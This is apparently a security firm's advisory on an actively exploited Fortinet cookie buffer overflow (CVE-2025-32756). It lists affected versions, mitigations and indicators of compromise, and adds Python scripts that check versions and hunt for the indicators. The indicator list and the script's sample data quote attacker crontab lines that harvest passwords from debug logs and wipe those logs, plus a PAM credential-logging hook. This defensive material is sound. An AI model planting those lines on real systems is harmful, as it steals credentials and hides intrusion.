- May 15, 2025
Critical Vulnerabilities in multiple Fortinet devices under Active Exploitation (CVE-2025-32756)
On May 13th, Fortinet published an advisory regarding a critical buffer overflow vulnerability identified as CVE-2025-32756 affecting FortiVoice, FortiMail, FortiNDR, FortiRecorder, and FortiCamera devices. If exploited successfully, the vulnerability could allow unauthenticated attackers to execute arbitrary code or commands via malicious HTTP cookies.
Executive Summary
Fortinet has confirmed active exploitation in the wild, specifically targeting FortiVoice systems at the time of this writing.
Beazley Security strongly advises upgrading to the latest fixed versions as specified below and reviewing any affected systems for compromise. Beazley Security MXDR teams have already conducted threat hunts in client environments and continue to monitor for this threat.
Affected Systems or Products
This vulnerability impacts several products running FortiOS:
| Affected System | Affected Versions | Solution |
| --- | --- | --- |
| FortiCamera 2.1 | 2.1.0 through 2.1.3 | Upgrade to 2.1.4 or above |
| FortiCamera 2.0 | 2.0 all versions | Migrate to a fixed release |
| FortiCamera 1.1 | 1.1 all versions | Migrate to a fixed release |
| FortiMail 7.6 | 7.6.0 through 7.6.2 | Upgrade to 7.6.3 or above |
| FortiMail 7.4 | 7.4.0 through 7.4.4 | Upgrade to 7.4.5 or above |
| FortiMail 7.2 | 7.2.0 through 7.2.7 | Upgrade to 7.2.8 or above |
| FortiMail 7.0 | 7.0.0 through 7.0.8 | Upgrade to 7.0.9 or above |
| FortiNDR 7.6 | 7.6.0 | Upgrade to 7.6.1 or above |
| FortiNDR 7.4 | 7.4.0 through 7.4.7 | Upgrade to 7.4.8 or above |
| FortiNDR 7.2 | 7.2.0 through 7.2.4 | Upgrade to 7.2.5 or above |
| FortiNDR 7.1 | 7.1 all versions | Migrate to a fixed release |
| FortiNDR 7.0 | 7.0.0 through 7.0.6 | Upgrade to 7.0.7 or above |
| FortiNDR 1.5 | 1.5 all versions | Migrate to a fixed release |
| FortiNDR 1.4 | 1.4 all versions | Migrate to a fixed release |
| FortiNDR 1.3 | 1.3 all versions | Migrate to a fixed release |
| FortiNDR 1.2 | 1.2 all versions | Migrate to a fixed release |
| FortiNDR 1.1 | 1.1 all versions | Migrate to a fixed release |
| FortiRecorder 7.2 | 7.2.0 through 7.2.3 | Upgrade to 7.2.4 or above |
| FortiRecorder 7.0 | 7.0.0 through 7.0.5 | Upgrade to 7.0.6 or above |
| FortiRecorder 6.4 | 6.4.0 through 6.4.5 | Upgrade to 6.4.6 or above |
| FortiVoice 7.2 | 7.2.0 | Upgrade to 7.2.1 or above |
| FortiVoice 7.0 | 7.0.0 through 7.0.6 | Upgrade to 7.0.7 or above |
| FortiVoice 6.4 | 6.4.0 through 6.4.10 | Upgrade to 6.4.11 or above |
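To turn the table above into a repeatable inventory check, the following added example (not Fortinet's or Beazley Security's code) encodes each branch's first fixed patch level and classifies a product/version pair as affected, fixed, or not covered by the advisory. Product names and the "migrate" handling are assumptions based only on the table.

```python
"""Classify a Fortinet product/version pair against the advisory's affected table."""
from typing import Dict, Optional, Tuple

# First fixed patch level per (major, minor) branch, transcribed from the table above.
# None means every release on that branch is affected and the fix is to migrate.
FIXED_IN: Dict[str, Dict[Tuple[int, int], Optional[int]]] = {
    "FortiCamera": {(2, 1): 4, (2, 0): None, (1, 1): None},
    "FortiMail": {(7, 6): 3, (7, 4): 5, (7, 2): 8, (7, 0): 9},
    "FortiNDR": {(7, 6): 1, (7, 4): 8, (7, 2): 5, (7, 1): None, (7, 0): 7,
                 (1, 5): None, (1, 4): None, (1, 3): None, (1, 2): None, (1, 1): None},
    "FortiRecorder": {(7, 2): 4, (7, 0): 6, (6, 4): 6},
    "FortiVoice": {(7, 2): 1, (7, 0): 7, (6, 4): 11},
}

def parse_version(ver: str) -> Tuple[int, int, int]:
    """Parse 'X.Y.Z' (an optional leading 'v' is tolerated) into an int tuple."""
    parts = ver.strip().lstrip("v").split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"expected X.Y.Z, got {ver!r}")
    return int(parts[0]), int(parts[1]), int(parts[2])

def assess(product: str, version: str) -> Tuple[str, str]:
    """Return (status, action). status is 'affected', 'fixed' or 'unknown'."""
    branches = FIXED_IN.get(product)
    if branches is None:
        return "unknown", "product not listed in the advisory"
    major, minor, patch = parse_version(version)
    branch = (major, minor)
    if branch not in branches:
        # A branch missing from the table is not evidence of safety; confirm with the vendor.
        return "unknown", f"{product} {major}.{minor} branch not listed in the advisory"
    first_fixed = branches[branch]
    if first_fixed is None:
        return "affected", "migrate to a fixed release"
    if patch < first_fixed:
        return "affected", f"upgrade to {major}.{minor}.{first_fixed} or above"
    return "fixed", "no action required for CVE-2025-32756"

if __name__ == "__main__":
    # Constructed inventory entries; not real device data.
    for product, version in [("FortiVoice", "7.0.6"), ("FortiMail", "7.6.3"), ("FortiNDR", "1.5.2")]:
        print(product, version, *assess(product, version))
```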
Mitigations / Workarounds
Beazley Security Labs strongly recommends upgrading affected Fortinet devices to the fixed versions listed in the table above. Where immediate patching is not feasible, Fortinet recommends disabling the HTTP/HTTPS administrative interface as a temporary workaround to reduce exposure.
Because this vulnerability affects FortiOS administrative interfaces, Beazley Security recommends that organizations take the following steps regardless of whether the recently released patches have been applied:
- Connect administrative interfaces to a trusted network segment that is not accessible from the internet.
- Ideally, only allow network traffic from a dedicated management network to reach the administrative interface.
- Deploy any internet-facing devices and services behind a web application firewall (WAF).
Patches
Fortinet has released patches to address CVE-2025-32756. To access and download firmware for Fortinet products, visit support.fortinet.com and log in with established account credentials. Within the support portal, navigate to firmware downloads and select the specific product to download the latest firmware versions. If you do not have an active support contract with Fortinet, you may need to contact Fortinet support to discuss options for obtaining firmware updates.
Guidance on versions that contain fixes to affected products can be found in the Affected Systems and Products table above.
Indicators of Compromise
Fortinet identified several indicators of compromise associated with exploitation of CVE-2025-32756 in its FortiGuard advisory (FG-IR-25-254) that can be useful for threat hunting. Note that most of these indicators are specific to the observed campaign and may change as other threat actors begin exploiting the vulnerability:
Malicious IPs observed:
File hashes observed:
Added or modified system files:
- /bin/wpad_ac_helper - MD5: 4410352e110f82eabc0bf160bec41d21 (malware)
- /bin/busybox
- /data/etc/crontab - line added:
  0 */12 * * * root busybox grep -rn passw /var/spool/crashlog/fcgi.debug > /var/spool/.sync; cat /dev/null >/var/spool/crashlog/fcgi.debug
- /var/spool/cron/crontabs/root - line added:
  0 */12 * * * root cat /var/spool/crashlog/fcgi.debug > /var/spool/.sync; cat /dev/null >/var/spool/crashlog/fcgi.debug
- /var/spool/.sync - credentials gathered into this file
- /etc/pam.d/sshd - lines added to load the malicious libfmlogin.so (next entry)
- /lib/libfmlogin.so - malicious library used to log SSH usernames and passwords
- /tmp/.sshdpm - contains credentials gathered by libfmlogin.so
- /bin/fmtest - script used to scan the network
- /etc/httpd.conf - line added to load socks.so:
  LoadModule socks5_module modules/mod_socks5.so
FCGI debugging - Fortinet states the following CLI command can be run to check the status of FCGI debugging:
  diag debug application fcgi
If the output shows "general to-file ENABLED", FCGI debugging has been enabled on the device, which is NOT the default setting.
Affected organizations should monitor for these IoCs and review system configurations for any unauthorized changes. For additional information, please refer to Fortinet’s official advisory.
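As an added example of hunting for the file-system artifacts listed above (this is not Fortinet's or Beazley Security's tooling), the function below runs the advisory's indicators over a snapshot of device files pulled from a backup or forensic image, plus the captured output of the FCGI debug status command. The snapshot layout, the PAM line and the file contents in the sample are constructed for illustration; the crontab and httpd.conf lines are the ones from the advisory.

```python
"""Hunt a file snapshot for the CVE-2025-32756 post-exploitation artifacts above."""
import hashlib
import re
from typing import Dict, List

# Artifacts taken from the advisory. The MD5 is the one given for /bin/wpad_ac_helper;
# other dropped files are flagged on presence, config files on content.
KNOWN_BAD_MD5 = {"4410352e110f82eabc0bf160bec41d21": "known malicious wpad_ac_helper"}
DROPPED_FILES = ["/bin/wpad_ac_helper", "/lib/libfmlogin.so", "/bin/fmtest",
                 "/tmp/.sshdpm", "/var/spool/.sync"]
CONTENT_RULES = [  # (path, regex, finding description)
    ("/data/etc/crontab", r"crashlog/fcgi\.debug.*/var/spool/\.sync",
     "cron job harvesting FCGI debug log into /var/spool/.sync"),
    ("/var/spool/cron/crontabs/root", r"crashlog/fcgi\.debug.*/var/spool/\.sync",
     "cron job harvesting FCGI debug log into /var/spool/.sync"),
    ("/etc/pam.d/sshd", r"libfmlogin\.so", "PAM stack loads credential-logging libfmlogin.so"),
    ("/etc/httpd.conf", r"LoadModule\s+socks5_module", "httpd loads a SOCKS5 proxy module"),
]

def hunt(snapshot: Dict[str, bytes], fcgi_debug_output: str = "") -> List[str]:
    """Return one finding string per matched artifact; an empty list means no match."""
    findings: List[str] = []
    for path in DROPPED_FILES:
        if path in snapshot:
            digest = hashlib.md5(snapshot[path]).hexdigest()
            label = KNOWN_BAD_MD5.get(digest, "unexpected file present")
            findings.append(f"{path}: {label} (md5 {digest})")
    for path, pattern, desc in CONTENT_RULES:
        text = snapshot.get(path, b"").decode("utf-8", "replace")
        for lineno, line in enumerate(text.splitlines(), 1):
            if re.search(pattern, line):
                findings.append(f"{path}:{lineno}: {desc}")
    # Output of 'diag debug application fcgi'; to-file debugging is not the default.
    if "general to-file ENABLED" in fcgi_debug_output:
        findings.append("fcgi: to-file debugging ENABLED (non-default; may capture credentials)")
    return findings

# Constructed sample snapshot: the crontab and httpd.conf lines match the advisory,
# the PAM line and the remaining file contents are made up for illustration.
SAMPLE_SNAPSHOT = {
    "/data/etc/crontab": b"0 */12 * * * root busybox grep -rn passw /var/spool/crashlog/fcgi.debug > /var/spool/.sync; cat /dev/null >/var/spool/crashlog/fcgi.debug\n",
    "/etc/pam.d/sshd": b"auth required pam_unix.so\nauth optional /lib/libfmlogin.so\n",
    "/etc/httpd.conf": b"LoadModule socks5_module modules/mod_socks5.so\n",
    "/tmp/.sshdpm": b"constructed placeholder for harvested credentials\n",
}
SAMPLE_FCGI_OUTPUT = "general to-file ENABLED\n"

if __name__ == "__main__":
    for finding in hunt(SAMPLE_SNAPSHOT, SAMPLE_FCGI_OUTPUT):
        print(finding)
```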
Technical Details
While Fortinet's advisory provided limited technical details, the vulnerability in FortiOS software impacts multiple Fortinet systems, including FortiVoice, FortiMail, FortiNDR, FortiRecorder, and FortiCamera. The flaw allows remote, unauthenticated attackers to trigger it by sending specially crafted HTTP requests containing a malicious hash cookie. Attacks in the wild have been observed against FortiVoice devices, likely because they are commonly exposed directly to the internet.
According to Zeropath research, the flaw arises from improper bounds checking while processing HTTP requests on affected devices. When a maliciously crafted hash cookie is sent to the device's HTTP/HTTPS interface, it can overflow a stack buffer and overwrite adjacent memory, which an attacker can potentially leverage to force the affected appliance to execute arbitrary commands and gain unauthorized access.
Attackers have purportedly exploited the vulnerability by targeting exposed HTTPS administrative interfaces on vulnerable devices. Observed post-exploitation activity includes conducting network scans, erasing crash logs, enabling built-in debug features to capture credentials, and deploying backdoor malware on compromised devices.
How Beazley Security is responding
Beazley Security is monitoring client perimeter devices through our Karma product to identify impacted devices and support organizations in remediation of any issues found.
We are also conducting threat hunts across our MXDR environment to detect potential exploitation attempts against our clients.